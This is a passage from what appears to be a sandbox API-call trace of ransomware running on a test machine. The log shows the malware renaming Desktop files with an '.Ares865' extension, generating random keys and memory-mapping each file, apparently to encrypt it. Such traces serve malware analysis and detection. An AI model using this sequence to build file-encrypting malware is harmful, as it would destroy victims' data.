halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qgbqc1hcsywd.flv.ares865"), dwFlags=0x1) returned 1 [0107.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\Qgbqc1HcsyWD.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qgbqc1hcsywd.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0107.295] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.298] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.298] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.298] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb00, lpName=0x0) returned 0x124 [0107.298] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb00) returned 0x190000 [0107.298] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.299] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.300] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\R-kRV3pgziGYGNY_Az.swf.Ares865") returned 89 [0107.300] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\R-kRV3pgziGYGNY_Az.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\r-krv3pgzigygny_az.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\R-kRV3pgziGYGNY_Az.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\r-krv3pgzigygny_az.swf.ares865"), dwFlags=0x1) returned 1 [0107.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\R-kRV3pgziGYGNY_Az.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\r-krv3pgzigygny_az.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.302] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52290) returned 1 [0107.302] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.303] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcf50, lpName=0x0) returned 0x124 [0107.303] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf50) returned 0x190000 [0107.305] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.305] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.305] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\RdfZ.swf.Ares865") returned 75 [0107.308] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\RdfZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\rdfz.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\RdfZ.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\rdfz.swf.ares865"), dwFlags=0x1) returned 1 [0107.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\RdfZ.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\rdfz.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36603) returned 1 [0107.312] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.313] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.313] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9200, lpName=0x0) returned 0x124 [0107.313] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9200) returned 0x190000 [0107.315] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.315] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.315] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\TSz_z.gif.Ares865") returned 76 [0107.318] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\TSz_z.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\tsz_z.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\TSz_z.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\tsz_z.gif.ares865"), dwFlags=0x1) returned 1 [0107.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\TSz_z.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\tsz_z.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50481) returned 1 [0107.320] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.321] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc840, lpName=0x0) returned 0x124 [0107.321] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc840) returned 0x190000 [0107.322] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.323] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.323] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\xTAKGQuuPFaG.gif.Ares865") returned 83 [0107.326] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\xTAKGQuuPFaG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\xtakgquupfag.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\xTAKGQuuPFaG.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\xtakgquupfag.gif.ares865"), dwFlags=0x1) returned 1 [0107.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\xTAKGQuuPFaG.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\xtakgquupfag.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=74620) returned 1 [0107.330] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.331] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.331] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12680, lpName=0x0) returned 0x124 [0107.331] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12680) returned 0x190000 [0107.333] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.334] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.334] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.337] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_" [0107.337] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\GyZ42O_.ods.Ares865") returned 74 [0107.337] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\GyZ42O_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\gyz42o_.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\GyZ42O_.ods.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\gyz42o_.ods.ares865"), dwFlags=0x1) returned 1 [0107.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\GyZ42O_.ods.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\gyz42o_.ods.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.349] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62314) returned 1 [0107.350] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.352] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.352] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.352] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf670, lpName=0x0) returned 0x124 [0107.352] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf670) returned 0x190000 [0107.354] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.354] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.354] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\U-4Pr.jpg.Ares865") returned 72 [0107.356] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\U-4Pr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\u-4pr.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\U-4Pr.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\u-4pr.jpg.ares865"), dwFlags=0x1) returned 1 [0107.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\U-4Pr.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\u-4pr.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=60175) returned 1 [0107.359] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.360] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xee10, lpName=0x0) returned 0x124 [0107.360] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xee10) returned 0x190000 [0107.361] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.365] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\Yx0Dl5BqC1B3ZyaDpjc.flv.Ares865") returned 86 [0107.365] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\Yx0Dl5BqC1B3ZyaDpjc.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\yx0dl5bqc1b3zyadpjc.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\Yx0Dl5BqC1B3ZyaDpjc.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\yx0dl5bqc1b3zyadpjc.flv.ares865"), dwFlags=0x1) returned 1 [0107.367] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\Yx0Dl5BqC1B3ZyaDpjc.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\yx0dl5bqc1b3zyadpjc.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94087) returned 1 [0107.368] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.368] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.368] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.369] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17290, lpName=0x0) returned 0x124 [0107.369] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17290) returned 0x190000 [0107.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.372] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.376] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4" [0107.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\EIcWrFCRfF3GNu.wav.Ares865") returned 98 [0107.377] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\EIcWrFCRfF3GNu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\eicwrfcrff3gnu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\EIcWrFCRfF3GNu.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\eicwrfcrff3gnu.wav.ares865"), dwFlags=0x1) returned 1 [0107.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\EIcWrFCRfF3GNu.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\eicwrfcrff3gnu.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57106) returned 1 [0107.383] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.384] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe220, lpName=0x0) returned 0x124 [0107.384] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe220) returned 0x190000 [0107.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\m2ZYm 34gdRwNd41 cMV.mkv.Ares865") returned 104 [0107.389] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\m2ZYm 34gdRwNd41 cMV.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\m2zym 34gdrwnd41 cmv.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\m2ZYm 34gdRwNd41 cMV.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\m2zym 34gdrwnd41 cmv.mkv.ares865"), dwFlags=0x1) returned 1 [0107.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\m2ZYm 34gdRwNd41 cMV.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\m2zym 34gdrwnd41 cmv.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91138) returned 1 [0107.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.392] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16710, lpName=0x0) returned 0x124 [0107.392] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16710) returned 0x190000 [0107.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.398] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\PX-fVL.swf.Ares865") returned 90 [0107.398] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\PX-fVL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\px-fvl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\PX-fVL.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\px-fvl.swf.ares865"), dwFlags=0x1) returned 1 [0107.401] CreateFileW 